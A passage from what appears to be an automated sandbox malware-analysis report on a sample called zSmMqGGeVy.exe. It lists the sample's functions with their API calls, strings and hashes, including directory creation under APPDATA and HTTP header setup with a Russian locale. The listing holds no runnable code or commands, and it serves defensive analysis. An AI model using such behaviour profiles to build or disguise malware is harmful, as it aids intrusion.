                                                  • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                  • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                                  • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                  • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                                  Function 0040B0DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
                                                  • type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0040B309
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
                                                  • _UnwindNestedFrames.LIBCMT ref: 0040B45F
                                                  • CallUnexpected.LIBVCRUNTIME ref: 0040B47A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                  • Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
                                                  • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                  • Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA
                                                  Function 00E9B342 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00E9B43F
                                                  • type_info::operator==.LIBVCRUNTIME ref: 00E9B461
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 00E9B570
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00E9B642
                                                  • _UnwindNestedFrames.LIBCMT ref: 00E9B6C6
                                                  • CallUnexpected.LIBVCRUNTIME ref: 00E9B6E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                  • Instruction ID: 8a8373d6bb8fefc6551eac08ae79e04a0a590870574b9560f1a7cb03e985bdcd
                                                  • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                  • Instruction Fuzzy Hash: E0B18C71900209EFCF24DFA4EA819AEBBB5FF14318F15616AE8157B212D730EA51CF91
                                                  Function 10008F36 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$___from_strstr_to_strchr
                                                  • String ID: `0
                                                  • API String ID: 3409252457-3674772010
                                                  • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                  • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                                  • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                  • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                                  Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                  • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                  • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                  • String ID: APPDATA$TMPDIR
                                                  • API String ID: 1838500112-4048745339
                                                  • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                  • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                  • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                  • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                  Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                  Strings
                                                  • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                  • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                  • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                  • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: HeadersHttpRequest$H_prolog3_
                                                  • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  • API String ID: 1254599795-787135837
                                                  • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                  • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                  • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                  • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                  Function 004110E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 004110FB
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 00411107
                                                  • _free.LIBCMT ref: 00411112
                                                  • _free.LIBCMT ref: 0041111D
                                                  • _free.LIBCMT ref: 00411128
                                                  • _free.LIBCMT ref: 00411133
                                                  • _free.LIBCMT ref: 0041113E
                                                  • _free.LIBCMT ref: 00411149
                                                  • _free.LIBCMT ref: 00411154
                                                  • _free.LIBCMT ref: 00411162
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                  • Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
                                                  • Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                  • Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84
                                                  Function 00EA134C Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00EA1362
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA136E
                                                  • _free.LIBCMT ref: 00EA1379
                                                  • _free.LIBCMT ref: 00EA1384
                                                  • _free.LIBCMT ref: 00EA138F
                                                  • _free.LIBCMT ref: 00EA139A
                                                  • _free.LIBCMT ref: 00EA13A5
                                                  • _free.LIBCMT ref: 00EA13B0
                                                  • _free.LIBCMT ref: 00EA13BB
                                                  • _free.LIBCMT ref: 00EA13C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                  • Instruction ID: f73c7fb6e8461d95ef5ca4cfe1ba0f233df5f9795f238dae84056b9b394cc098
                                                  • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                  • Instruction Fuzzy Hash: 0321747A90011CEFCB45EFA5D881DDE7BB9AF09341F0161A6B615AF121DB31EA448B81
                                                  Function 10006D58 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                  • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                                  • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                  • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                                  Function 0041A609 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDecodePointer.NTDLL(?), ref: 0041A622
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                  • Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
                                                  • Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                  • Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E
                                                  Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                  • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                  • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2751267872-393685449
                                                  • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                  • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                  • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                  • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                  Function 00E992EF Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00E992CD), ref: 00E992FB
                                                  • GetModuleHandleW.KERNEL32(0041DFB8,?,?,00E992CD), ref: 00E99306
                                                  • GetModuleHandleW.KERNEL32(0041DFFC,?,?,00E992CD), ref: 00E99317
                                                  • GetProcAddress.KERNEL32(00000000,0041E018), ref: 00E99329
                                                  • GetProcAddress.KERNEL32(00000000,0041E034), ref: 00E99337
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E992CD), ref: 00E9935A
                                                  • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 00E99376
                                                  • CloseHandle.KERNEL32(0042AF60,?,?,00E992CD), ref: 00E99386
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID:
                                                  • API String ID: 2565136772-0
                                                  • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                  • Instruction ID: 155c40a68eaca0fcb6ec87516587afd9e2560c04e6f8d301c58fd0e04329e75f
                                                  • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                  • Instruction Fuzzy Hash: EA01DDF1F403216FDB305F75BD09B9E3BA8AB4CB05B154035FD05E2191D7ACC801866A
                                                  Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __RTC_Initialize.LIBCMT ref: 1000291D
                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                  • String ID:
                                                  • API String ID: 2442719207-0
                                                  • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                  • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                  • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                  • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                  Function 0040ABE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040AC17
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040ACA8
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040AD28
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                  • Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
                                                  • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                  • Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA
                                                  Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                  • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                  • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                  • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                  Function 0041611C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe$obA
                                                  • API String ID: 0-1494245280
                                                  • Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                  • Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
                                                  • Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                  • Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8
                                                  Function 00411B4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                  • Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
                                                  • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                  • Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8
                                                  Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                  • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                  • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                  • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                  Function 00417082 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F
                                                  • _free.LIBCMT ref: 004170D0
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 004170DB
                                                  • _free.LIBCMT ref: 004170E6
                                                  • _free.LIBCMT ref: 0041713A
                                                  • _free.LIBCMT ref: 00417145
                                                  • _free.LIBCMT ref: 00417150
                                                  • _free.LIBCMT ref: 0041715B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                  • Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
